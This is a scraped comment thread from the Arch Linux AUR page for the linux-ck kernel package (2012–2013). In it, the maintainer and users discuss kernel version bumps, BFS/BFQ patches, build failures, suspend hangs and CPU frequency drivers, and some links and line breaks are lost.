10:12:48 HALF-BLOOD systemd[1]: Starting Sleep. lip 18 10:12:48 HALF-BLOOD systemd[1]: Reached target Sleep. lip 18 10:12:48 HALF-BLOOD systemd[1]: Starting Suspend... lip 18 10:12:48 HALF-BLOOD systemd-sleep[4388]: Suspending system... Looks like everything is fine, but I end up with flashing dash and all I can do is manually switch power off.yz - Well, it seems that this is i686 only and does exist in the my ck1 builds. % ls -l /usr/lib/modules/3.10.1-2-ck/kernel/drivers/of total 8 -rw-r--r-- 1 graysky users 2233 Jul 14 08:52 of_i2c.ko.gz -rw-r--r-- 1 graysky users 2776 Jul 14 08:52 of_mdio.ko.gz Dunno what to say about suspend. There is actually an Arch flyspray[1] about this so others are having problems without the ck1 patchset I think. 1. xzy3186 commented on 2013-07-15 15:17 Hi graysky, Thanks for your reply. Yes, the full name of the module is called of_i2c. I am using a 32-bit kernel with which I have the following output: yaourt -Ql linux | grep of_i2c linux /usr/lib/modules/3.10.1-1-ARCH/kernel/drivers/of/of_i2c.ko.gz Another problem I am suffering with linux-ck is that I could not suspend my system. If I do so, the system will get frozen (no way to wake it up without turning off the power). However, everything is working properly under official kernel... graysky commented on 2013-07-14 12:16 Bump to v3.10.1-2 Changelog: Set the CONFIG_INTEL_MEI* from hardcoded to modules following flyspray #36144[1] and the ubuntu bug report/lkml discussion therein. This may have positive effects for users experiencing graphical corruptions/black screens from suspend. Commit: 1. graysky commented on 2013-07-14 11:26 @xzy - I just copy the config/config.x86_64 from the ARCH set, and apply the ck1+bfq to it. What is the full name of the module? Is it 'of_i2c'? If I extract the 3.9.9-1-ARCH source and find for it, I do not find it. % find /scratch/old/usr/lib/modules -name 'of_i2c*' If I compare 3.10.1-2-ck to 3.10.1-1-ARCH, there are 107 modules that contain the term 'i2c': % find /scratch/arch/usr/lib/modules -name '*.ko.gz' | grep i2c | wc -l 107 % find /scratch/ck/usr/lib/modules -name '*.ko.gz' | grep i2c | wc -l 107 xzy3186 commented on 2013-07-14 02:08 Hi graysky, Do you have any idea why the kernel module of of_i2c is never compiled for linux-ck, including 3.10 and previous versions? I checked the official kernel and it is there. Furthermore, CONFIG_OF_I2C is set to 'm' in the config of linux-ck. In my sense, it should be compiled. BFQ is ready for 3.10 series. For those of you [misc] who like to see or build/run the pre-release of the next linux-ck as we wait for CK to patch into the new tree, I am hosting the incomplete (no ck1) stuff here: graysky commented on 2013-07-04 09:50 Bump to v3.9.9-1 Changelog: Commit: graysky commented on 2013-07-02 00:40 @misc - Did you open a bug with upstream by chance? I saw you logged one against the ARCH package[1]. Little worry about this affecting 3.10-1-ck since it takes CK ~1-1/2 weeks to release a BFS once a new major kernel is released (I came up with this number based on the last six bfs/ck-1 releases). Also, see the his blog wherein he talks about his travel plans extending the usual time out further[2]. 1. 2. - Seems like upstream would be eager to add this support to linux-next. If it's the same for Haswell as it is for ivy, it is a one-line patch as you pointed out. As of 19-Jun-2013, it doesn't look like there is support for Haswell: Bump to v3.9.5-2 Changelog: Sync'ed PKGBUILD with that of official ARCH. Functionally, there is no difference between 3.9.5-1 and 3.9.5-2; there is no need for users of 3.9.5-1 to update to 3.9.5-2. Commit: OK... I am now mirroring the patchset; you can directly modify the PKGBUILD like this or simply download it and manually move it into the build directory. 1) Download AUR source and extract 2) cd linux-ck 3) sed -i 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.9/"http:\/\/repo-ck.com\/source\/ck1/' PKGBUILD SirWuffleton commented on 2013-05-26 09:36 @dkaylor Just finished a compile on one of my boxes and still had it around. I've got a temporary mirror here: I'll leave it up until either ck.kolivas.org comes back up or graysky hosts a mirror on repo-ck. @clayman - You should post on the bbs. I believe your interest is identifying a method to have the pstate driver honor niced processes? You might have better luck posting on the google+ thread: @hepha - Are you reporting that your machine is freezing at shutdown like in the flyspray you posted? @sphere - How are you reading the operating frequencies? My understanding is that a util like i7z in [community] accurately reports frequencies for sandy/ivybridge processors but older utils do not. What is the output of: `sudo i7z` It could be related to the pstate driver. This is the future of Linux power management and is included by upstream for sandybridge CPUs in 3.9 and has been slated (I think) for inclusion for ivybridge CPUs in 3.10 but this patch has been applied to linux-ck by default in 3.9.3. If you are experiencing problems with it using the ivybridge processor you can disable the patch in the PKGBUILD (just delete the 'y' in the line starting with _pstates_ivy=y). You can test to see if you are using pstates with this command: `cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver` If it returns a value of 'intel_pstate' then you are using them. petterk commented on 2013-05-21 18:21 After this update, my cpu is reportedly running at 3.1ghz even with powersave governor (same with performance, up to 3,4ghz), even tho the stock freq is 2.4ghz (even says so on a sticker on the front of the laptop). Previously it was running at around 1200mhz with ondemand and 2.4ghz with performance. Regards petterk commented on 2013-05-21 17:29 btw using ck-ivybridge on my i7-3630qm petterk commented on 2013-05-21 17:29 After the update to 3.9.3-1, my cpu is running at 3.1ghz instead of the stock 2.4ghz. Also, previously I had it running on on-demand when on battery, and Performance when on AC-adapter. Isnt the cpu using governors anymore? If thats the case, how can I set up a similar setup with LMT? Regards graysky commented on 2013-05-21 07:50 Not a stupid question. Both Sandy and Ivybridge CPUs get a more sophisticated method of managing frequency called pstates. This is true for linux-ck and linux (Arch standard). You aren't using the ondemand any more. Search for pstates in google and on the forums for more. clayman commented on 2013-05-21 06:58 Hi, probably a stupid question but hey -- with 3.9.3 I've been missing the /sys/devices/system/cpu/cpufreq/ondemand/ignore_nice_load setting. I'm running BOINC and this thing keeps my CPU temps low. Where did it go? I use standard config in this regard. mantiz commented on 2013-05-20 19:41 @graysky: I know that. ;-) And I already compiled the kernel with the PKGBUILD and patches provided here. But as you see in my last comment, the ck-patch takes care that the options that I think I need can not be enabled at the same time with BFS. As soon as I have some more time that I can spend on this I will contact Con Kolivas why these options are disabled and what the problems are in detail. I don't wanna harm my system or even worse my data. ;-) After that I will give this another try. But to be honest, I don't want a kernel that I have to compile on my own with each update. And since the only reason for me using the ck-kernel are large file copies because with the normal cfq-scheduler they cause many freezes on my machine I will use the "normal" kernel from the core-repo until then. Right now my priority is lxc and large file copies are not that often. ;-) But I am really thankful for your comments, helped me a lot otherwise I would still be trying to get the ck-kernel working and neglect my work that I really have to do now before anything else. :) graysky commented on 2013-05-20 19:17 @mantiz - Nothing is stopping you from compiling the arch kernel from ABS and enabling whatever patches you like in this PKGBUILD. Or by that same logic, replacing the config/config.x86_64 in this pkg with the stock arch ones, and simply commenting out the line that patches the code with the CK patchset. mantiz commented on 2013-05-20 16:11 @graysky: I unsuccessfully built this package on my own. Well, the build was successful and I was able to boot this kernel but the required features weren't there. After looking at the ck-patch it is obvious that this couldn't work because these settings are modified by "depends on !SCHED_BFS". So, I think you were right that these settings are conflicting with BFS. I will stick with the core-repo-kernel for now and see if I still need to use the bfq-scheduler or if I can live without it. And I will contact "him" in order to ask if there is any possibility to support these options or any workaround for this. I will post the answer here as soon as I have the time to write this mail and get an answer. Thanks for your help so far. graysky commented on 2013-05-20 13:55 @mantiz - Thanks for the link. I still recommend that you ask on CK's blog. He knows the code better than I :p mantiz commented on 2013-05-20 13:10 Ok, I don't think that user sessions are involved ("User namespace" is missing in the core-repo-kernel, too) but I really don't know systemd and cgroups very well, so I don't know which features are related to each other. I will try to add these options manually and see if this works. Thanks for the info, I didn't know that BFS has any problems with cgroups although it is mentioned in the wiki (my fault). You can get informations about lxc at if you are interested. It is also referred to as 'chroot on steriods'. ;-) graysky commented on 2013-05-20 12:49 Not sure what an archlinux-lxc-container is but if it is related to user sessions which depend on the cgroups you mentioned, they and BFS are mutually exclusive. In other words, BFS can't have them to the best of my knowledge. You might try posting this question to CK's blog to get an official answer from him. mantiz commented on 2013-05-20 12:45 I am having problems with starting an archlinux-lxc-container (with systemd) by using the ck-kernel(s). I am using linux-ck-nehalem and linux-ck-ivybridge on my systems. It turned out that the kernel from the core-repo works fine and I think the problem is that the ck-kernels are missing "CONFIG_CGROUP_CPUACCT" and "CONFIG_CGROUP_SCHED" which are enabled by the core-repo-kernel. Would it be possible to enable these options with the ck-kernels? I would really appriciate this. ;-) Hi, I'm having an strange issue in 3.9, I can't login in a tty (I don't start in graphical mode by default), the login cursor doesn't appear or blinks and keyboard seems not to be working (I can't switch between ttys). I can login through ssh and shutdown the system. I have compiled with 300 Hz instead of 1 kHz tick rate, but the same happens. Is something like that happening to anybody? I've read about hangs in laptops here... graysky commented on 2013-05-18 07:35 ...think I am changing my mind about enabling the ivybridge pstates patch by default; I have read many positive things about folks using this for >4 weeks now with no ill-effects. Sunday or Monday when 3.9.3 gets released, I will have it enabled by default for repo users too. graysky commented on 2013-05-17 20:23 I misunderstood your question. There is no need to rename the package. Just enable the corresponding options (including the nconfig) and select your CPU type for the nconfig menu. You may select either the 3rd gen i7 option, or if building on the same machine, the native option. This is just a patch. Edit the PKGBUILD and set the variable in the first few commented lines to enable it. Instructions and info are contained in the same section as well. Again, note that I am not enabling this be default, so repo users will not have this enabled. Rebump of v3.9.2-2 Notes: I just updated v3.9.2-2 with an optional feature to enable the new Intel Pstate driver for Ivybridge CPUs. See the g+ thread[1] which is containing in this bbs thread. Again, this is 100 % optional. 1. 2. Commit: graysky commented on 2013-05-17 19:50 I just updated v3.9.2-2 with an optional feature to enable the new Intel Pstate driver for Ivybridge CPUs. See the g+ thread which is containing in this bbs thread. 1. graysky commented on 2013-05-12 20:05. I will be placing 3.8.13-1-ck along with all related package into the Archive Section on repo-ck should users want access to the now deprecated 3.8 series: The 3.9.2-2-ck build should be finished around midnight GMT and the repo populated with fresh 3.9.2-2-ck and related packages. Enjoy! graysky commented on 2013-05-12 18:23. graysky commented on 2013-05-12 12:04 Bump to v3.8.13-1 Changelog: BFQ gets updated to 3.8.0-v6r1 Commit: Notes: I am still trying to figure out why the freeze-on-reboot on my laptop (and now on my workstation) using the 3.9.2-1-ck code I posted about here on 2013-05-11 21:05. Det commented on 2013-05-12 11:09 v6r1 and .13 are up. graysky commented on 2013-05-11 21:05. Precompiled packages: Source to compile it yourself: Original post: affects my laptop gets resolved. What happens? When I reboot or shutdown, the system hangs after everything goes down. CK has edited his blog announcement acknowledging the behavior[1]. To date, I do not believe this issue is resolved. 20:41. Also note that I am building the packages as I type this, so expect them there in about 1/2 h if all goes well with my upstream bandwidth to godaddy (21:15 GMT). Precompiled packages: Source to compile it yourself: Original post: 19:52.1-1-ARCH throws the same text errors[2], but the system power cycles. That is in contrast to 3.9.1-1-ck which also complains about the connection being refused, (likely unrelated to the actual freeze), but then hangs until I power if off. 1. 2.:11 I'm trying to compile 3.9.1, but it's failing with: ... patching file sound/usb/usx2y/usx2yhwdeppcm.c patching file include/sound/emu10k1.h Reversed (or previously applied) patch detected! Skipping patch. 1 out of 1 hunk ignored -- saving rejects to file include/sound/emu10k1.h.rej patching file sound/pci/emu10k1/emu10k1_main.c Reversed (or previously applied) patch detected! Skipping patch. 4 out of 4 hunks ignored -- saving rejects to file sound/pci/emu10k1/emu10k1_main.c.rej Any ideas? graysky commented on 2013-05-08 20:07 @Andre - I see. I can tell you that the nvidia-304xx and virtualbox modules do not show anything bad in my dmesg; both of these have not been compiled against 3.8.12. I did have to rebuild the broadcom-wl-ck module however. andre.vmatos commented on 2013-05-08 20:01 Hmm, IMHO, I think he means that 3rd-part modules (e.g. virtualbox) compiled for 3.8 series are showing errors, often symbol errors, upon insertion, avoiding it to load properly in 3.8.12, even when a compilation for 3.8 series are supposed to be binary-compatible with all 3.8 series (symbols and binary compatibility should change only in major (3.x) upgrades, requiring a recompilation or even patching). graysky commented on 2013-05-08 20:00 Meant to post this link to the pre-release of 3.9.1-ck which is nearly 100 %. It is just missing the official yet-to-be-released BFQ which Paolo tells me should not be different from the current release which patches into 3.9 just fine. Bump to v3.8.12-1 Changelog: Commit: Notes: Tpowa noted that the 3.8.12 release is a "binary module breaker" which I assume explains the mkinitcpio output when it built my fallback image: ==> WARNING: Possibly missing firmware for module: aic94xx ==> WARNING: Possibly missing firmware for module: bfa Dunno the scope of this and how it will affect users. CK has released an rc quality patch featuring v0.430 of BFS[1]. I am running it here and wanted to give folks the chance to tinker with it as well: Notes: 1) This is a pre-release so only download and compile the source if you accept that fact. 2) There is no BFQ yet, since Paolo has yet to release an updated patch. The old version of BFQ actually patches into the 3.9 tree without errors, but I do not want to run it until I hear back from him as to whether it is safe. 3) If you run this and find problems or you run this and find that it works just fine, please consider giving CK some feedback on the his blog I linked. 1. graysky commented on 2013-05-03 19:28 CK has released an rc quality patch featuring v0.430 of BFS. Running it here and wanted to give folks the chance to tinker with it as well: 1) There is no BFQ since Paolo has yet to release an updated patch. 2) The old version of BFQ actually patches into the 3.9 tree without errors, but I do not want to run it until I hear back from him as to whether it is safe. Kalrish commented on 2013-05-03 19:07 @graysky Thanks a lot, it worked like a charm -as always!-. @Det In my opinion, including a temp-host URL in a PKGBUILD would not be very... fair? I think it's up to the user to download the patch from an unofficial (yet useful) server. (In any case, is up again.) @misc - @Kalrish - Yeah, ck has been experiencing some addition problems with his VPS. I am hosting. Run this sed line on the PKGBUILD and you are good to go: sed 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.8/"http:\/\/repo-ck.com\/source\/mirror/' PKGBUILD Plz do not flag out of date until all needed components are updated. From the wiki: "Linux-ck roughly follows the release cycle of the official ARCH kernel. The following are requirements for its release: Upstream code CK's Patchset BFQ Patchset ARCH config/config.x86_64 sets for major version jumps only"/ =) FYI-CK knows his shit is down; his VPS is doing a poor job fixing it. flamusdiu commented on 2013-04-14 11:35 @graysky - seems that the patch is missing on the repo-ck site now. :'( graysky commented on 2013-04-13 11:04 @fincan - Yeah, it's down alright. I am temp hosting the files on repo-ck.com. Run this on the dir with the PKGBUILD to build this until their servers are back up: sed -i 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.8/"http:\/\/repo-ck.com\/source\/ck1_temp/' PKGBUILD fincan commented on 2013-04-13 05:55 is down? I could not download the patch graysky commented on 2013-04-12 22:24 Bump to v3.8.7-1 Changelog: Commit: graysky commented on 2013-04-08 20:07 Bump to v3.8.6-3 Changelog: Several to follow. *Add required build-time dependencies [bc will be needed in 3.9] (FS#34600). *Updated config files so as not to require user input as a function of the gcc patch. *Re-wrote PKGBUILD to use prepare function and opened [ FS#34688] to match my changes. *Added missing keys file in headers package. *Added "save configuration for later reuse" to match ARCH PKGBUILD. Commit: graysky commented on 2013-04-05 20:03 Bump to v3.8.6-1 Changelog: Commit: graysky commented on 2013-04-02 18:44 Yeah, looks like upstream's website is down. I am temp hosting the files on repo-ck.com. Run this on the dir with the PKGBUILD to build this until their servers are back up: sed -i 's/_bfqpath=.*/_bfqpath=\"http:\/\/repo-ck.com\/source\/bfq_temp\"/' PKGBUILD 3.8.3 has been released but I plan to wait for the ARCH package to see if tpowa et al incorporate any patches/fixes of their own before pushing. Plz flag this when 3.8.1-1-ARCH goes live if you see it before I do. I notice over a 50% drop in wireless bit rate using this kernel compiled for 2nd gen i7 i.e. i7-avx. Signal level and link quality are the same. ~~~~~~~~~~ Wifi Card: Intel Centrino 1000 N Driver: iwlwifi Laptop: Lenovo Ideapad y560p Diagnostic tool: iwconfig ~~~~~~~~~~ Symptoms: > 3.7.10-1-ARCH Kernel: --> Wireless connects quickly and sits at 150Mbps > 3.8.2-1 CK Kernel from AUR compiled for 2nd gen i7: --> Wireless sits around the 15-75Mbps rate, it starts low and builds its way up. Upon reaching ~75Mbps, the wireless bit-rate remains constant. It also takes longer to associate. Signal level and Link Quality are the same. ~~~~~~~~~ Steps to reproduce: 1. Install 3.8.2-1 CK Kernel for i7-avx with BFQ on default. 2. Use iwlwifi with Intel Centrino 1000 N wireless card. 3. Connect to wireless N router.: It would be perfectly valid to do such a thing on your end. Although I personally find nconfig simpler and more intuitive, you could modify your local PKGBUILD to include any of the *config options if you find one of the X-based tools to be more:19 : These analyses are an ANOVA showing you the time it took to compile (y-axis in sec) each of the 9 runs under each kernel (x-axis). Black dots = time points. Green diamonds = 95 % confidence intervals. The circles to the right are comparison circles. If these are separated, the differences in average times are statistically significant. In other words, BFS is still faster than CFS. This is true for both machines tested. Note that I will expand this to a few other machines in the next few days.: P.S. Sorry for multiple posts. Cannot edit as you know. graysky commented on 2013-03-03 19:13 . graysky commented on 2013-03-03 19:12 . misc @misc - Nothing was actually wrong with the patch, I mistakenly changed the source in the PKGBUILD to point to the patch for the 3.7 tree, not the 3.8 tree. This has been fixed and works with both arches. @radioact - No need, I have done this in the -0 release of linux-ck-3.8. See my comment below (2013-02-25 20:45) for the announcement and link. Still no update from CK by the way. @Raziel23 - Very helpful, thank you. Updated the PKGBUILD to reflect this new location. @MatejLach - I updated the PKGBUILD per your feedback using a find statement that shouldn't trip makepkg if nulls are found. I tested it forcing a delete of $srcdir/linux-3.7/include/config/dvb/*.h and it worked fine. Please build with it disabling the dvb shit as you do and report back. Note that I did not bump the pkgver version. MatejLach commented on 2013-02-27 19:59 I'm building 3.7.9-2 BTW. MatejLach commented on 2013-02-27 19:56 Indeed, when I delete this: mkdir -p "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" [[ -e include/config/dvb/ ]] && cp include/config/dvb/*.h "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" It is enough, to compile the kernel without problems. Were there any changes there compared to previous PKGBUILD? Isn't it misc who is always interested in the pre-release of package? The ground work has been laid for the 3.8 release. We just need CK to publish. For those who MUST have the code, it is below. REMEBER that there is no bfs in this yet!: The i686 architecture is still fully supported, I'm running the latest version of linux-ck on my i686 box with no issues whatsoever. If you are referring to the comment referencing PAE and i686, the only thing that comment was asking was to enable HIGHMEM64/PAE to allow more memory to be used by the i686 kernel without additional configuration on the user's end. In no way was it inferring that the i686 architecture is no longer being supported. Senth commented on 2013-02-12 21:54 then.. i686 architecture is not supported ? graysky commented on 2013-02-11 22:13 Bump to v3.7.7-1 Changelog: Commit: graysky commented on 2013-02-11 22:12 Hi, How can I get all of the sources? I am trying to build alsa-driver.hda-intel.hda-codec-realtek-git and getting the following error: The file /lib/modules/3.7.4-1-ck/build/include/INCLUDE_VERSION_H does not exist. Please install the package with full kernel sources for your distribution or use --with-kernel=dir option to specify another directory with kernel sources (default is /lib/modules/3.7.4-1-ck/build). Thanks, Mike nomodset took me to ttys in fedora kernel 3.7.2.204 64 bit. But Arch Testing 3.7.3 kernel or your kernel doesn't go beyond fsck. It just goes black. There has been a bunch of updates for intel KMS in this kernel. Not sure if that's the culprit. Not sure if anyone else is having the same issue too. - Correct. I am building up 3.7.2-2 right now. Even on my cluster, it take about 7 min per package. As you know, there are 25 packages across i686/x86_64 and all the cpu flavors to build. Should be online in 2-3 h from now. @graysky I have tried making linux-uksm-ck be able to disable uksm and become linux-ck, but in a very ugly way since if you disable ck or uksm, the kernel suffix remains -uksm-ck. I can only fix this problem in a very ugly way, so I would rather not to use a extremely ugly method to solve a ugly problem. The extremely ugly method is to modify linux-uksm-ck.install linux-uksm-ck.preset dynamically when makepkg is running. But it results in the wrong checksum when you want to rebuild the package. Then a more more more ugly method can be used, that is to change the checksum dynamically... So, is it better not to merge them? What do you think? - Yes, that it there to remove extra info from versioning just like in the ARCH kernel's PKGBUILD. If you are curious about it, simply copy the file that it modifies to a new name, run the sed line, then diff the two files. You will see. Thaodan commented on 2012-12-21 02:28 Im' updating my modifed linux-pf PKGBUILD (added propper package-naming description) and addded some changes that you done to your PKGBUILD (for example docs, turn of NUMA). And I found 'sed -ri "s|^(EXTRAVERSION =).*|\1 -${pkgrel}|" Makefile' in your PKGBUILD, for what is it? @kyak - Yes, it should. Thank you for reporting. It was a typo on my part in my repo build script which has been corrected a few min ago: @mrbit - This is an unfortunate limitation of the ncurses interface. You have two options: 1) Make your terminal larger before your run makepkg 2) Change line 183 to: make menuconfig This should do it for you: sed -i 's/make nconfig/make menuconfig/' PKGBUILD mrbit commented on 2012-12-12 12:40 _makenconfig="y" ==> Running make nconfig HOSTCC scripts/kconfig/nconf.gui.o HOSTCC scripts/kconfig/nconf.o HOSTLD scripts/kconfig/nconf scripts/kconfig/nconf Kconfig Your terminal should have at least 20 lines and 75 columns make[1]: *** [nconfig] Errore 1 make: *** [nconfig] Errore 2 ==> ERRORE: kyak commented on 2012-12-12 12:36 Hi graysky, I think that virtualbox-ck-host-modules-core2 should replace virtualbox-ck-host-modules-corex. Otherwise i have to resolve conflict between virtualbox-ck-host-modules-corex and linux-ck-core2 manually (i.e. remove virtualbox-ck-host-modules-corex, then replace linux-ck-corex with repo-ck/linux-ck-core2, then install virtualbox-ck-host-modules-core2). graysky commented on 2012-12-12 12:25 @mrbit - You will need to edit the PKGBUILD and change the nconfig option to "y" before you compile. Once you start makepkg to compile, you will be presented with the usual nconf. The cpu options can be enabled under: Processor type and features>Processor family Note that I am pretty sure the i5-2400 is a sandy bridge (gen2 core processor). You should google around to be sure. mrbit commented on 2012-12-12 11:13 how to change the config.x86_64 for Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz ?? graysky commented on 2012-12-12 10:38 @snack - Yes, I did change my key. Sorry, I posted this to the support thread in the bbs but not here: "Already all, hosting issues are fixed and repo is populated with new packages. Note that I generated a new gpg key and revoked the old one. Pacman should grab it automatically. YOU WILL NEED TO SIGN THE KEY. Do so after pacman imports it or after you manually import it. % sudo pacman-key --lsign-key 5EE46C4C ==> Updating trust database... Enjoy!" snack commented on 2012-12-12 03:30 While trying to install 3.6.10 I get: errore: linux-ck-core2: key "88A032865EE46C4C" is unknown errore: key "88A032865EE46C4C" could not be looked up remotely errore: linux-ck-core2-headers: key "88A032865EE46C4C" is unknown errore: key "88A032865EE46C4C" could not be looked up remotelyù I didn't get this error with previous updates. Graysky, did you change your key? Or is there something wrong in my pacman keyring? pub 2048R/6176ED4B 2011-11-07 uid graysky <graysky@archlinux.us> sub 2048R/9B453E32 2011-11-07 graysky commented on 2012-12-12 01:23 @misc - Ha, sure. I haven't tested it, but did diff it against the official one. Plz test and lemme know if bad. Note to other users - This is PRERELEASE package and does not contain ck1 or bfq! To answer your question, no, there are changes to the PKGBUILD as well. See: I tested the 'kernel-36-gcc47-1.patch' written by André Ramnitz using three different machines running a generic x86-64 kernel and an otherwise identical kernel running with the optimized gcc options. Conclusion: There are small but real speed increases using a make endpoint to running with this: @misc - If memory serves me, Steven told me that the perl script you mentioned differs from the call to `make localmodconfig` somehow. Plz follow-up with him and let me know. @xzy3186 - Not sure... plz try with the linux package from [testing] and verify that it isn't an upsteam bug. Seeing that streamline_config.pl is still being actively maintained ( ), wouldn't it be worth to try out how it performs? Only as precursor to localmodcfg, not on its own, of course. I mean, if the Steven Rostedt still truly considered it such a bad idea, wouldn't they have removed it by now?:28 @graysky, Thanks, i understand that these CPU-specific options are "under Processor type and features>Processor family or by setting-up the .config file accordingly." However, i'm wondering how do you build linux-ck-corex from this PKGBUILD? Are you using some script to modify .config or you are choosing the processor manually every time? Also, the package name is "linux-ck-corex", not just "linux-ck", so you definitely change the PKGBUILD. Could you tell more about how you do it, so i could rebuild linux-ck-corex here? For now all i got is this PKGBUILD, and it is not straigtforward how to get binary linux-ck-corex out of it. Is there any way to include a custom DSDT? nconfig does not enable the necessary options to be edited. Also I'm assuming if we want to compile with optimizations we would put them in $MAKEFLAGS, correct? For example on my 2600k I would use -j9 and --mtune=native, where would those go?x - OK. Glad to hear that it is again not a problem with the ck patches, but with the upstream. You should spend some time googling for the specific crash. On one of my boxes, I found that the 3.6 series crashes if I power down with my lirc modules probed. If I rmmod them and then shutdown, no issues at all.x - First question I always ask is: have you also tested version x from the official repos... in this case however, the devs have not bumped 3.6.3-->3.6.4 yet. As soon as they do, I would ask you to test it and see if you get the same problem. I actually have yet to see a panic that was caused by ck's stuff. jqww2002 commented on 2012-10-29 08:23 I got a panic after update to v3.6.4 (x86) today from repo-ck.com. The panic message is "PANIC:early exception 08 rip246:10 error 81041d86 cr2 0". I try google and find that adding mem=4000M to grub, all it's ok. But I have 6G mem, v3.6.3 is all ok. Can any help? Glad to see its not specific to me or iPhones. I just tried out linux-mainline from AUR (3.7-rc2) and it does not have any issues with copying files though nautilus/gvfs-afc, so I guess the issue is only in the 3.6 series atm.: that's correct. I have a specific BUILDDIR setup in makepkg.conf and I think this is a valid thing to do. It helps keep the older builds around (for debugging, speeding up the builds and so on). So, it's good if the PKGBUILD explicitly references the patches/files to be used. Can you modify the PKGBUILD to specifically look for the 3.6 BFQ patches? My source directory happens to have both the older 3.5 patches and the newer 3.6 patches for BFQ. I guess it is probably better to hardcode patch names in PKGBUILd. Just a FYI: I'm stick at 3.5.x because there is a serious problem [1] of zram in the 3.6 tree. A patch was submitted two days ago but not seen in the latest 3.6.2 build. And @graysky, there is a 3.5.7 release, maybe it's appropriate to update to it? [1] graysky commented on 2012-10-13 14:43 @OK100 - Not out-of-date. I am aware of the release; see my previous comment. I am in email contact with Con now attempting to diagnose and fix. graysky commented on 2012-10-13 13:34 OK! CK just released[1] an OFFICIAL CK1 with bfs v0.425 that patches into the 3.6 tree, however it has a slight problem and will not build with guest virtualization enabled which as you know is part of the stock ARCH config. I emailed him and hope to have a fix soon. I will keep you updated. [1] graysky commented on 2012-10-13 13:33 OK! CK just released an OFFICIAL CK1 with bfs v0.425 however it has a slight problem and will not build with guest virtualization enabled which as you know is part of the stock ARCH config. I emailed him and hope to have a fix soon. I will keep you updated. graysky commented on 2012-10-11 01:06 Just wanted to update the group -. For those interested, I have the source package 3.6.1-4 which you can download and build yourself. This version has the aforementioned option disabled and builds just fine for me (both x86_64 and i686). Download it from here: graysky commented on 2012-10-11 00:50 Well guys -. [ ] Processor type and features --->Paravirtualized guest support ---> Just wanted to update the group. It's some time i use linux-ck-p4 without any problem, but today, during attempting the upgrade to the 3.5.5-1 version i had this problem: acchetti (2): linux-ck-p4-3.5.5-1 linux-ck-p4-headers-3.5.5-1 Dimensione totale dei pacchetti da installare: 91,71 MiB Dimensione netta dell'aggiornamento: 0,00 MiB Vuoi procedere con l'installazione? [S/n] s (2/2) verifica dell'integrità dei pacchetti [########################################] 100% errore: linux-ck-p4: signature from "graysky <graysky@archlinux.us>" is unknown trust errore: linux-ck-p4-headers: signature from "graysky <graysky@archlinux.us>" is unknown trust errore: impossibile eseguire l'operazione richiesta (il pacchetto non è valido oppure è corrotto (firma PGP)) Si sono verificati degli errori, nessun pacchetto è stato aggiornato. [root@bridge-live mikronimo]# @stlifey - Nice. Although the web interface seemed to give me a backwards patch, applying with the -R switch is just fine. Will test a bit and then upload. Until then, check my math: You need to apply with: patch -Rp1 -i $srcdir/unfuck.patch commented on 2012-10-02 19:36 @fincan - I saw it but ck1 [bfs] does not patch into it due to some upstream changes: ==> Patching source with ck1 including bfs v0.424 drivers/cpufreq/cpufreq_conservative.c patching file arch/x86/Kconfig patching file kernel/sched/bfs.c patching file kernel/sched/Makefile patching file mm/vmscan.c Hunk #2 succeeded at 928 (offset 32 lines). Hunk #3 succeeded at 1921 (offset 32 lines). Hunk #4 succeeded at 2873 (offset 32 lines). Hunk #5 succeeded at 2885 (offset 32 lines). patching file include/linux/swap.h patching file mm/memory.c patching file mm/swapfile.c patching file mm/page-writeback.c Makefile ==> ERROR: A failure occurred in build(). Hello, with the latest PKGBUILD the order for depmod and "move module tree /lib -> /usr/lib" was exchanged and it gives this error: DEPMOD 3.5.4-1-ck ERROR: could not open directory /home/user/linux-ck/pkg/linux-ck/usr/lib/modules/3.5.4-1-ck: No such file or directory FATAL: could not search modules: No such file or directory Undoing the change, it builds correctly.: linux-ck-headers provides also "linux-headers=${pkgver}", but I think it should not, especially if you have more kernels (I have installed linux and linux-ck) For example, compiling r8168-all. alium commented on 2012-08-28 07:28 linux-ck-headers provides also "linux-headers=${pkgver}", but I think it should not, especially if you have more kernels (I have installed linux and linux-ck) For example, compiling r8168. I decided to give the modprobed_db + localmodcfg a try. I'm using lvm2 with dm-crypt, and run into errors when mkinicpio. dm-snapshot and dm-mirror, which are appearently required, are not found. When I manually load these via modeprobe, they don't appear after I run modprobed_db store. Any one have thoughts on this? My current solution it to also run nconfig and manually enable it. graysky, ok, I will. The developer guy in alsa-devel who made this patch said, that it will be included in upstream. I think it will be included in 3.6. I just found that audio codec is used 100% of time as powertop says and this cannot be fixed without reboot or suspend, but everything was OK for me in 3.4.x. corro commented on 2012-08-23 00:50 I can confirm a noticable improvement in battery life with this patch applied. When measuring power consumption with powertop, it says it's about 2-3 Watts less than before. The latest kernel 3.6-rc3 has the same problem. ValdikSS, you should definitely report this issue. @ValdikSS - I changed my mind about your suggestion and have added it to v3.5.2-3. Can I ask that you open a bug report against the linux package in [testing] reporting the known issue and directing them to the patch you referenced? Will upload new PKGBUILD in a few. Bump to v3.5.2-1 Sorry for the double bump, but I wanted to add more verbosity to the original announcement from 16 Aug 2012 21:18:39 Enjoy! I agree with you because the stability of this patch is really bad. But the stability of the patch for 3.4.6+(enable CONFIG_NO_HZ) is great. I am using it for several days and everything works great. "{_basekernel}.6+-ck${_ckpatchversion}" If you do not enable CONFIG_NO_HZ, there will not be any changes. I am using the kernel which has been modified by me now. Although it can be run, it seems to be unstable. At first, 12:07 I am using the kernel which has been modified by me now. Although it can be run, it seems to be unstable. 10:57 Well, after simply commenting the call of calc_load_enter_idle() and calc_load_exit_idle(), compilation has been completed with no errors. I do not know whether there will be bugs or not after doing so. I guess that these two function is used for matching with the new core.c, but bfs.c does not have any changes. So, tick-sched.c need not be changed. Deleting the call of the functions MAY not cause problems. I am afraid of trying it... - Dunno, still waiting for CK to fix this. @all - here is a prerelease of 3.5-1 which does NOT contain a ck1 patchset nor does it contain a BFS. This is an incomplete package but if some of you want to use v3.5 under the linux-ck name, go for it. Note that you need to enable [testing]. On my test system, the USB mouse didn't work without doing so. qpalz commented on 2012-08-06 04:42 For In the ck patch, there are the following changes: --- linux-3.4-ck3.orig/kernel/sched/Makefile 2012-03-20 